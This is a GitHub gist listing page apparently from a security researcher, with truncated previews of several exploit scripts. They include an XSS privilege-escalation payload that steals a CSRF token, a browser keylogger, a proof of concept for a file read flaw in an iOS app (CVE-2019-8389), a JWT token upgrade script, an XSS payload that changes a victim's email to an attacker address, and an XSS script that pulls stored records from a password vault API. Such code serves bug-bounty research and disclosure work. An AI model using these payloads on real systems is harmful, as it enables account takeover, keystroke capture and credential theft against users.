shawarkhanethicalhacker
/ XSS_Privilege_Escalation.js
Created Aug 4, 2019
Privilege escalation exploit code for XSS vulnerability that I have recently discovered.
View XSS_Privilege_Escalation.js
| // XSS Exploit code for Privilege Escalation | |
| // Author: Shawar Khan | |
| var woot = document.createElement('html'); | |
| fetch('https://vulnerablesite.com/settings',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){ | |
| woot.innerHTML=data; | |
| var csrf_token = woot.getElementsByTagName('meta')[3]['content']; | |
| privilege_escalate(); |
shawarkhanethicalhacker
/ exptest.js
Created Apr 24, 2019
View exptest.js
| var keys = ''; | |
| document.onkeypress = function(e) { | |
| var get = window.event ? event : e; | |
| var key = get.keyCode ? get.keyCode : get.charCode; | |
| key = String.fromCharCode(key); | |
| keys += key;---- | |
| } | |
| window.setInterval(function(){ |
shawarkhanethicalhacker
/ Musicloud-exploit.py
Last active Feb 17, 2019
[CVE-2019-8389] An exploit code for exploiting a local file read vulnerability in Musicloud v1.6 iOS Application
View Musicloud-exploit.py
| #!/usr/bin/python | |
| # Proof of concept for CVE-2019-8389 | |
| # Exploit author: Shawar Khan | |
| import sys | |
| import requests | |
| def usage(): | |
| print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n" |
shawarkhanethicalhacker
/ token.py
Last active Jan 28, 2019
A little automation for obtaining JWT token for a POC
View token.py
| # A sample code that obtains a permanent JWT token when provided a temporary JWT token | |
| import json | |
| import requests | |
| import sys | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| jwt_token=raw_input("Enter token > ") | |
| exploit_url = "https://secure.site.com:443/aapi/v1/authentications/token" | |
| exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.site.com", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "https://www.site.com", "Connection": "clos"} |
View alert.js
| alert(1337) |
shawarkhanethicalhacker
/ email_change_exploit_xss.js
Created Sep 14, 2018
This is a sample exploit for exploiting an XSS vulnerability that changes the user email. This bypasses some CSRF protections as the page was revoking the CSRF protections when refreshed.
View email_change_exploit_xss.js
| // a Simple XSS exploit for email change | |
| // Shawar Khan | |
| var dark_window = window.open('https://www.target.com/settings'); | |
| dark_window.addEventListener('load', | |
| function exploit_run(){ | |
| dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email | |
| dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission |
shawarkhanethicalhacker
/ password_vault_exploit.js
Created Aug 20, 2018
XSS Exploit code for retrieving passwords stored in a Password Vault
View password_vault_exploit.js
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |